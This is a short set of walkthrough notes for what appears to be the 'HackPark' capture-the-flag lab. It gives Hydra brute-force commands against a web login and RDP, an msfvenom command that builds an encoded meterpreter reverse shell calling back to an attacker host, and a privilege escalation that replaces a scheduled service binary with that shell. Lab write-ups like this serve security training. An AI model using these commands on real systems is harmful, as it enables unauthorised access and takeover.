HackPark

1. Google reverse image search

2. Hydra - parallelized, fast and flexible login cracker post: type of request windows website login would use get request payload: Network > All > post request > Request Payload command format: hydra -l -P . $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ login: admin password: 1qaz2wsx

hydra cheat sheet: Command Description hydra -P -v Brute force against a protocol of your choice hydra -v -V -u -L -P -t 1 -u You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts) hydra -t 1 -V -f -l -P rdp:// Attack a Windows Remote Desktop with a password list. hydra -l -P . $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ Craft a more specific request for Hydra to brute force.

3. Enumerate website -find BlogEngine.NET specification v: 3.3.6.0 -search for exploit -gain initial access

4. gain reverse tcp using msfvenom msfvenom -p windows/meterpreter/reverse_tcp -a x86 —encoder x86/shikata_ga_nai LHOST=10.9.. LPORT=2345 -f exe -o revshell.exe -serve file using python server python3 -m http.server access to meterpreter

5. escalate privileges -use windows-exploit-suggester -find abnormal service WindowsScheduler.exe Message.exe executed every 30 seconds -goal is to create ‘Message.exe’ reverse shell to gain higher privileges

6. find root and user flags